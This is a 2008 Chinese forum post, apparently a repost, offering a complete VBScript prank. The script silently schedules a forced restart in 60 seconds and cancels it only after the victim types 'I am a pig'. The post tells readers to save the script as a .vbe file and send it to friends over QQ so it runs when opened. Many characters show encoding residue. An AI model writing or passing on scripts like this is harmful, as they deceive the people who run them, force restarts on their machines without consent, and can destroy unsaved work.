QQ 整人使人關(guān)機(jī)原代碼(轉(zhuǎn)) 本貼由 太空戰(zhàn)將 發(fā)表于 2008-8-9 11:59 您是本帖第2737個(gè)瀏覽者[收藏到QQ書簽] 本人只為娛樂,如果出現(xiàn)什么后果,后果自負(fù)。 ------------------------------------------------------------------------------------ on error resume next dim WSHshellA set WSHshellA = wscript.createobject("wscript.shell") WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""說我是豬,不說我是豬就一分鐘關(guān)你機(jī),不信,試試···"" ",0 ,true dim a do while(a <> "我是豬") a = inputbox ("說我是豬,就不關(guān)機(jī),快撒,說 ""我是豬"" ","說不說","不說",8000,7000) msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox" loop msgbox chr(13) + chr(13) + chr(13) + "早說就行了嘛" dim WSHshell set WSHshell = wscript.createobject("wscript.shell") WSHshell.run "cmd.exe /c shutdown -a",0 ,true msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真過癮" 把上面的文字復(fù)制到記事本內(nèi)。另存為名字隨便你起記住后面的一定要加 .vbe 使用文件傳送給朋友只要朋友一打開一分鐘就會關(guān)機(jī)。如上面說的要你說那三個(gè)字就不會關(guān)機(jī)了大家試試吧 |
|